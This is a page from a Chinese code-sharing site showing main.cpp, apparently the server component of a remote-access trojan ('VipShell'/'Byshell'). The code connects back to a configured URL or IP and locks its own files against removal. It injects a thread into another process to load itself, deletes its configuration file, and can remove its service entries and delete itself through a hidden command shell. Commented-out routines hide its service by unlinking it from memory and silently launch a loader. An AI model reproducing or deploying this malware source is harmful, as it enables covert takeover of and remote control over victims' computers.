main.cpp
来自「软件源代码,共享。有2个文件」· C++ 代码 · 共 967 行 · 第 1/2 页
CPP
967 行
//hServer.ConnectServer(hServerConfig->szUrl);
//hServer.ConnectServer(hServerConfig->szIp, _ttoi(hServerConfig->szIp_Port));
if( _ttoi(Conf_URLDNS) == 1 )//==1为URL方式上线
{
hServer.ConnectServer(Conf_Url);
dbglog("采用URL方式连接客户端");
}
if( _ttoi(Conf_URLDNS) == 2 )//==2为DNS方式上线
{
hServer.ConnectServer(Conf_Ip, _ttoi(Conf_Ip_Port));
dbglog("采用DNS方式连接客户端");
}
//srand((unsigned)time(NULL));
//Sleep((DWORD)rand() % 1500);
//锁定服务端DLL
char DllPath[MAX_PATH]={0};
GetModuleFileNameA(g_hinstDLL,DllPath,MAX_PATH);
DllLockHandle = OpenFile(DllPath,&ofstruct,OF_READ|OF_SHARE_EXCLUSIVE);
//锁定服务端EXE
char ExePath[MAX_PATH];//
GetModuleFileNameA(g_hinstDLL,DllPath,MAX_PATH);
strncpy(DllPath + strlen(DllPath) - 3,"",1);//去掉自身路径末尾的 dll
strcpy(ExePath,DllPath);
strcat(ExePath,"exe");
ExeLockHandle = OpenFile(ExePath,&ofstruct,OF_READ|OF_SHARE_EXCLUSIVE);
while(1)
{
dbglog("服务端正在运行,傀儡进程存活");
Sleep(300000);//5 min
}
WSACleanup();
}
//extern "C" __declspec(dllexport) bool HideService()
//{
// ////COpenDesktop hDesktop;
// ////COpenDesktop hDesktop1;
//
// //LPVIPSHELLCONFIG hServerConfig = (LPVIPSHELLCONFIG)lp;
//
// //srand((unsigned)time(NULL));
// //Sleep((DWORD)rand() % 3000);
//
// ////开始摘除服务链
// // int i;
// // for (i = 0x300000;i<0x5000000;i+=4){
// // //printf("%x\n",i);
// // __try{
// // if (0 == wcsicmp((const unsigned short *)i,hServerConfig->szServiceName)){
// // char temp [32];
// // sprintf(temp,"found service at: %x\n",i);
// // SearchDWORD(i,hServerConfig->szServiceName);
// // }
// // }
// // __except(EXCEPTION_EXECUTE_HANDLER ){
// // //printf("error\n");
// // i-=4;
// // i += 0x1000;
// // }
// // }
// ////摘除服务链
//
// return 0;
//}
//
//void SearchDWORD(int Addr,LPCTSTR HideServiceName)
//{
//int i;
//for (i = 0x300000;i<0x5000000;i+=4){
// //printf("%x\n",i);
// __try{
// if (Addr == *(ULONG*)i){
// char temp [32];
// sprintf(temp,"found the point at: %x\n",i);
//
// if (0 == wcsicmp((const unsigned short *)(*(ULONG*)(i+4)),HideServiceName)){
// //found the right one
// PFAKE_SERVICE_RECORD pRecord;
// pRecord = (PFAKE_SERVICE_RECORD)(i-8);
// *((DWORD*)pRecord->Prev+1) = (DWORD)(pRecord->Next);
// *((DWORD*)pRecord->Next) = (DWORD)(pRecord->Prev);
// }
// }
// }
// __except(EXCEPTION_EXECUTE_HANDLER ){
// //printf("error\n");
// i-=4;
// i += 0x1000;
//
// }
//}
//
//}
extern "C" __declspec(dllexport) bool GetDllModuleControl(CDllModuleControlInterface** p)
{
*p = (CDllModuleControlInterface*)&g_hDllModule;
dbglog("LoadLibrary成功,等待Loader启动主函数");
return true;
}
DWORD WINAPI HideMe(LPVOID lpParameter)
{
typedef BOOL (*PVipShellStartServer)(LPVOID lp);
PThreadParam a = (PThreadParam)lpParameter;
HINSTANCE hDll = NULL;
PVipShellStartServer pfnVipShellStartServer = NULL;
BOOL bFlag = FALSE;
hDll = a->pfnLoadLibraryA(a->szDllName);
if( !hDll ) return FALSE;
pfnVipShellStartServer = (PVipShellStartServer)a->pfnGetProcAddress(hDll, a->szFunctionName);
if( !pfnVipShellStartServer) return FALSE;
bFlag = pfnVipShellStartServer(/*&a->lp*/0);
a->pfnFreeLibrary(hDll);
return bFlag;
}
void InjectHideMeRemote(HANDLE hProcess,/*DWORD dwProcessId,*/ /*LPVIPSHELLCONFIG lp*/ LPCSTR szFnName)
{
ThreadParam tp;
HINSTANCE hKernel32 = NULL;
//DWORD dwPid;
DWORD dwFuncSize = 2048;
//dwPid = dwProcessId;
hKernel32 = GetModuleHandle( L"kernel32.dll" );
tp.pfnGetProcAddress = (PGetProcAddress)GetProcAddress(hKernel32, "GetProcAddress");
tp.pfnLoadLibraryA = (PLoadLibraryA)GetProcAddress(hKernel32, "LoadLibraryA");
tp.pfnFreeLibrary = (PFreeLibrary)GetProcAddress(hKernel32, "FreeLibrary");
strcpy(tp.szFunctionName, szFnName);
GetModuleFileNameA((HINSTANCE)g_hinstDLL, tp.szDllName, MAX_PATH);
//memcpy(&tp.lp, lp, sizeof(VIPSHELLCONFIG));
if(InjectRemote(hProcess, /*dwPid,*/ HideMe, dwFuncSize, &tp, sizeof(tp), /*1000*/INFINITE))
{
dbglog("开始创建远程线程");
}
else
{
dbglog("开始创建远程线程失败");
}
}
DWORD WINAPI RemoveServer(LPVOID lpParameter)//Remove
{
char ExePath[MAX_PATH];//
char DllPath[MAX_PATH];//
RemoveServiceByReg(Conf_ServiceName);
RemoveService(Conf_ServiceName);
RemoveServiceByReg(Conf_ServiceName);
RemoveService(Conf_ServiceName);
CloseHandle((HANDLE)ExeLockHandle);
CloseHandle((HANDLE)DllLockHandle);
CloseHandle((HANDLE)ExeLockHandle);
CloseHandle((HANDLE)DllLockHandle);
//GetSystemDirectory(EXEDir,MAX_PATH);
GetModuleFileNameA((HINSTANCE)g_hinstDLL, DllPath , MAX_PATH);
strncpy(DllPath + strlen(DllPath) - 3,"",1);//去掉自身路径末尾的 dll
strcpy(ExePath,DllPath);
strcat(ExePath,"exe");
DeleteFileA(ExePath);
DeleteFileA(ExePath);
//drvldr_stop("NTboot32");//尝试停止驱动
//Sleep(5);
//drvldr_dereg("NTboot32");//尝试删除驱动
//Sleep(5);
//DeleteFileA(EXEDir);
//DeleteFileA(SYSDir);
//RemoveDelayLoad();
//RemoveService(L"NTboot");
Sleep(1);
dbglog("卸载完成");
Sleep(1);
SelfDelete();
ExitProcess(0);//退出进程
return 0;
}
BOOL SelfDelete()
{
TCHAR szModule [MAX_PATH],
szComspec[MAX_PATH],
szParams [MAX_PATH];
// 得到文件路径:
if((GetModuleFileName((HINSTANCE)g_hinstDLL,szModule,MAX_PATH)!=0) &&
(GetShortPathName(szModule,szModule,MAX_PATH)!=0) &&
(GetEnvironmentVariable(L"COMSPEC",szComspec,MAX_PATH)!=0))
{
// 设置命令参数
lstrcpy(szParams,L" /c del ");
lstrcat(szParams,szModule);
lstrcat(szParams,L" > nul");
lstrcat(szComspec,szParams);
// 设置结构体成员
STARTUPINFO si={0};
PROCESS_INFORMATION pi={0};
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
// 为程序分配资源
SetPriorityClass(GetCurrentProcess(),
REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_TIME_CRITICAL);
// 调用命令
if(CreateProcess(0, szComspec, 0, 0, 0,CREATE_SUSPENDED|
DETACHED_PROCESS, 0, 0, &si, &pi))
{
// 暂停命令直到程序退出
SetPriorityClass(pi.hProcess,IDLE_PRIORITY_CLASS);
SetThreadPriority(pi.hThread,THREAD_PRIORITY_IDLE);
// 恢复命令并设置低优先权
ResumeThread(pi.hThread);
return TRUE;
}
else // 如果出错,格式化分配的空间
{
SetPriorityClass(GetCurrentProcess(),
NORMAL_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_NORMAL);
}
}
return FALSE;
return 0;
}
//void RemoveDelayLoad(void)
//{
// RegDeleteKey(HKEY_CLASSES_ROOT,L"CLSID\\{bfbc1a78-cddd-1672-876e-324d6c4686e9}");
// RegDeleteKey(HKEY_LOCAL_MACHINE,L"SOFTWARE\\Classes\\CLSID\\{bfbc1a78-cddd-1672-876e-324d6c4686e9}");
// //RegDeleteKey(HKEY_LOCAL_MACHINE,L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\\{bfbc1a78-cddd-1672-876e-324d6c4686e9}");
// if(RegDeleteKey(HKEY_LOCAL_MACHINE,L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad"))
// {
// dbglog("删除注册表键值成功");
// }
// else
// {
// dbglog("注册表键值已经清除");
// }
//}
//
//void RemoveRunKey(void)
//{
// RegDeleteKey(HKEY_LOCAL_MACHINE,L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run");
//}
void RemoveServiceByReg(LPCTSTR ServiceName)
{
WCHAR regkeyEnum[512]={0};
WCHAR regkeySecurity[512]={0};
WCHAR regkey[512]={0};
lstrcat(regkeyEnum,L"System\\CurrentControlSet\\Services\\");
lstrcat(regkeyEnum,ServiceName);
lstrcat(regkeyEnum,L"\\Enum");
RegDeleteKey(HKEY_LOCAL_MACHINE, regkeyEnum);
lstrcat(regkeySecurity,L"System\\CurrentControlSet\\Services\\");
lstrcat(regkeySecurity,ServiceName);
lstrcat(regkeySecurity,L"\\Security");
RegDeleteKey(HKEY_LOCAL_MACHINE, regkeySecurity);
lstrcat(regkey,L"System\\CurrentControlSet\\Services\\");
lstrcat(regkey,ServiceName);
RegDeleteKey(HKEY_LOCAL_MACHINE, regkey);
return;
}
void RemoveService(LPCTSTR ServiceName)
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
SERVICE_STATUS RemoveServiceStatus;
schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
schService=OpenService(schSCManager,ServiceName,SERVICE_ALL_ACCESS);
if(schService==NULL)
{
CloseServiceHandle(schSCManager);
}
else
{
//printf("Stopping Service .... ");
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
{
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
{
//printf("already Stopped !\n");
}
else
{
//printf("Pending ... ");
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
{
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
{
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
}
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
{
//printf("Success !\n");
}
else
{
//printf("Failure !\n");
}
}
else
{
//printf("Failure !\n");
}
}
}
else
{
//printf("Query Failure !\n");
}
//printf("Removing Service .... ");
if(DeleteService(schService)==0)
{
//printf("Failure !\n");
}
else
{
//printf("Success !\n");
}
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
BOOL APIENTRY DllMain(HINSTANCE hinstDLL, HANDLE hModule,
LPVOID lpReserved
)
{
/*
//////////////////////////////检测到DLL被explorer加载,则启动主程序
TCHAR szLoader[MAX_PATH];
GetModuleFileName(NULL, szLoader, MAX_PATH);
_tcslwr(szLoader);
if (_tcsstr(szLoader, _T("explorer.exe")))
{
dbglog("DLL 当前被 explorer.exe加载");
HANDLE hMap=CreateFileMappingA((HANDLE)0xFFFFFFFF, NULL,PAGE_READWRITE, 0, 128,"_B_y_s_h_e_l_l_1_0_9_");
if(hMap==NULL)//如果创建失败
{
dbglog("创建互斥量对象失败");
return FALSE; //退出此程序
}
//如果已经存在这个同名对象, 说明已有需要互斥的其他程序运行了
else if(GetLastError()==ERROR_ALREADY_EXISTS)
{ LPVOID lpMem=MapViewOfFile(hMap, FILE_MAP_WRITE, 0,0,0);
UnmapViewOfFile(lpMem); //解除映射图
CloseHandle(hMap); //关闭此对象
return FALSE;//退出此程序
}
else //经过上面的检查, 说明这是第一个运行的互斥程序
{ LPVOID lpMem=MapViewOfFile(hMap, FILE_MAP_WRITE, 0,0,0);
UnmapViewOfFile(lpMem); //解除映射图
}
char szNTbootPath[MAX_PATH];
GetSystemDirectoryA(szNTbootPath,MAX_PATH);
strcat(szNTbootPath,"\\NTboot.exe");
if(WinExec(szNTbootPath,SW_HIDE))
{
dbglog("启动 Loader 成功");
}
else
{
dbglog("启动 Loader 失败");
}
}
//////////////////////////////
*/
g_hinstDLL = hinstDLL;
return TRUE;
}
bool GetMyConfig(BOOL DelConfiger)
{
WCHAR DllPath[MAX_PATH]={0};
WCHAR szConfPath[MAX_PATH]={0};
GetModuleFileName((HINSTANCE)g_hinstDLL, DllPath , MAX_PATH);
wcsncpy(DllPath + lstrlen(DllPath) - 3,L"",1);//去掉自身路径末尾的 dll
lstrcpy(szConfPath,DllPath);
lstrcat(szConfPath,L"dat");
GetPrivateProfileString(L"Config",L"Url",NULL,Conf_Url,sizeof(Conf_Url),szConfPath);
GetPrivateProfileString(L"Config",L"Explain",NULL,Conf_Explain,sizeof(Conf_Explain),szConfPath);
GetPrivateProfileString(L"Config",L"Ip",NULL,Conf_Ip,sizeof(Conf_Ip),szConfPath);
GetPrivateProfileString(L"Config",L"Ip_Port",NULL,Conf_Ip_Port,sizeof(Conf_Ip_Port),szConfPath);
GetPrivateProfileString(L"Config",L"FileName",NULL,Conf_FileName,sizeof(Conf_FileName),szConfPath);
GetPrivateProfileString(L"Config",L"ServiceName",NULL,Conf_ServiceName,sizeof(Conf_ServiceName),szConfPath);
GetPrivateProfileString(L"Config",L"DisplayName",NULL,Conf_DisplayName,sizeof(Conf_DisplayName),szConfPath);
GetPrivateProfileString(L"Config",L"Description",NULL,Conf_Description,sizeof(Conf_Description),szConfPath);
GetPrivateProfileString(L"Config",L"URLDNS",NULL,Conf_URLDNS,sizeof(Conf_URLDNS),szConfPath);
GetPrivateProfileString(L"Config",L"Inject",NULL,Conf_Inject,sizeof(Conf_Inject),szConfPath);
if(DelConfiger)
{
DeleteFile(szConfPath);
}
else
{
return 0;
}
return 0;
}
bool SetMyExplain(LPCTSTR Explain)
{
HKEY hKeyExplain;
WCHAR KeyExplain[512]={0};
lstrcpy(KeyExplain,L"SYSTEM\\CurrentControlSet\\Services\\");
lstrcat(KeyExplain,Conf_ServiceName);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,KeyExplain,0,KEY_ALL_ACCESS,&hKeyExplain);
RegSetValueEx(hKeyExplain,L"Explain",0,REG_SZ,(const BYTE *)Explain,256);
RegCloseKey(hKeyExplain);
return 0;
}⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?